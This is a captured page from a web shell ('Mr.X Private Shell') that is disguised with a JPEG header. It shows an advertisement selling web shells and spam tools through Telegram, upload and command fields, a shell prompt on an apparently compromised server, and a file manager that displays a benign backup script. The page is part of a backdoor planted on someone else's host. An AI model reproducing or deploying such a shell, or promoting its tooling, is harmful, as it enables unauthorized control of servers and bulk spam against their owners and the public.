����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# 960_dsmc_verify_isofile.sh

is_true $TSM_RM_ISOFILE || return 0

Log "Verify if the ISO file '$TSM_RESULT_FILE_PATH/$ISO_PREFIX.iso' was archived correctly with dsmc"
if [[ -z "$TSM_ARCHIVE_MGMT_CLASS" ]]; then
    LC_ALL=${LANG_RECOVER} dsmc q backup "$TSM_RESULT_FILE_PATH/$ISO_PREFIX.iso" >/dev/null
else
    LC_ALL=${LANG_RECOVER} dsmc q archive "$TSM_RESULT_FILE_PATH/$ISO_PREFIX.iso" >/dev/null
fi
if [[ $? -eq 0 ]]; then
    Log "Removing $ISO_DIR/$ISO_PREFIX.iso to preserve space"
    if rm $v -f $ISO_DIR/$ISO_PREFIX.iso ; then
        LogPrint "The only remaining copy of the ISO file is under TSM:$TSM_RESULT_FILE_PATH/$ISO_PREFIX.iso"
        Log "To preserve space also removing the TSM_RESULT_FILES ${TSM_RESULT_FILES[*]}"
        rm $v -f "${TSM_RESULT_FILES[@]}"
    else
        Log "Could not remove $ISO_DIR/$ISO_PREFIX.iso so the local files are kept"
    fi
else
   LogPrint "TSM did not confirm that the ISO file was stored properly so the local files are kept"
fi


Filemanager

Name Type Size Permission Actions
950_dsmc_save_result_files.sh File 2.09 KB 0644
960_dsmc_verify_isofile.sh File 991 B 0644